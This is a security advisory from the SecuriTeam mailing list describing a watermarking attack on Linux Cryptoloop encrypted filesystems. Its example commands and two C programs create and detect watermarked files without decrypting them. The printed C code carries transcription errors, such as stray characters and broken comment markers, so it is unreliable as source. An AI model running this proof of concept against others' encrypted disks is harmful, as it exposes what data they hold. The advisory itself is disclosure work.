The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam
web site: http://www.securiteam.com
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
SUMMARY
Cryptoloop "makes it possible to create encrypted file systems within a
partition or another file in the file system. These encrypted files can
the be moved to a CD, DVD, USB memory stick, etc. Cryptoloop makes use of
the loop device. This device is a pseudo-device which serves as a 'loop'
through which each call to a the file system has to pass. This way, data
can be processed in order to encrypt and decrypt it".
Cryptoloop is vulnerable to watermarking, making it possible to determine
presence of watermarked data on the encrypted filesystem.
DETAILS
This attack exploits weakness in IV computation and knowledge of how file
systems place files on disk. This attack works with file systems that have
soft block size of 1024 or greater. At least ext2, ext3, reiserfs and
minix have such property. This attack makes it possible to detect presence
of specially crafted watermarked files, such as, unreleased Hollywood
movies, cruise missile service manuals, and other content that you did not
create yourself. Watermarked files contain special bit patterns that can
be detected without decryption.
For example, to encode author's first name Jari as watermark, we should
use ASCII characters 74 97 114 105. This example uses encodings 10β¦13.
# mount -t ext2 /dev/fd0 /mnt -o loop=/dev/loop0,encryption=AES128
Password:
# ./create-watermark-encodings 10:74 11:97 12:114 13:105
>/mnt/watermarks
# umount /mnt
And then to detect these watermarks:
# dd if=/dev/fd0 bs=64k | ./detect-watermark-encodings
22+1 records in
22+1 records out
1474560 bytes scanned
watermark encoding 10, count 74
watermark encoding 11, count 97
watermark encoding 12, count 114
watermark encoding 13, count 105
Create watermarks:
/*
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
unsigned char buf[1024];
char *progName;
void encodeOne(int encoding)
{
memset(buf, 0, sizeof(buf));
buf[512] = 1;
if(encoding < 1) encoding = 1;
if(encoding < 32) {
buf[512 + (encoding * 16)] = 1;
}
}
void writeOne(void)
{
if(fwrite(buf, 1024, 1, stdout) != 1) {
perror("write failed");
exit(1);
}
}
int main(int argc, char **argv)
{
int encoding, y = 0;
unsigned long count, x;
progName = *argv;
if(argc < 2) {
usage:
fprintf(stderr, "usage: %s encoding:count [encoding:count]...
>filename\n", progName);
exit(1);
}
while(βargc > 0) {
if(sscanf(++argv, "%d:%lu", &encoding, &count) != 2) {
goto usage;
}
for(x = 0; x < count; x++) {
encodeOne(encoding);
writeOne();
y++;
}
}
/ make file size multiple of 4K (to avoid fs tail packing) */
while(y & 3) {
memset(buf, 0, sizeof(buf));
writeOne();
y++;
}
if(fflush(stdout)) {
perror("write failed");
exit(1);
}
exit(0);
}
Detect watermarks:
/*
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
unsigned long found[32];
unsigned char buf[1024];
unsigned long long bytes = 0;
int main(int argc, char **argv)
{
int x, y;
memset(found, 0, sizeof(found));
do {
if(fread(buf, 1024, 1, stdin) != 1) break;
bytes += 1024;
y = 0;
do {
/* no encoding if ciphertexts do not match */
if(memcmp(&buf[y] , &buf[y + 512], 16)) break;
/* if ciphertext is same repeated byte, assume */
/* that block was newer written with ciphertext */
for(x = 1; x < 16; x++) {
if(buf[y + x] != buf[y]) break;
}
if(x == 16) break;
/* found watermark encoding */
y += 16;
} while(y < 512);
if(y) {
found[(y >> 4) - 1] += 1;
}
} while(1);
printf("%llu bytes scanned\n", bytes);
y = 1;
for(x = 0; x < 32; x++) {
if(found[x]) {
printf("watermark encoding %d, count %lu\n", x + 1, found[x]);
y = 0;
}
}
if(y) {
printf("no watermark encodings found\n");
}
exit(0);
}
ADDITIONAL INFORMATION
The original article can be found at:
<http://marc.theaimsgroup.com/?l=linux-kernel&m=107719798631935&w=2>
http://marc.theaimsgroup.com/?l=linux-kernel&m=107719798631935&w=2
The information has been provided by <mailto:jariruusu (a) users !
sourceforge ! net> Markku-Juhani O. Saarinen.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
[email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.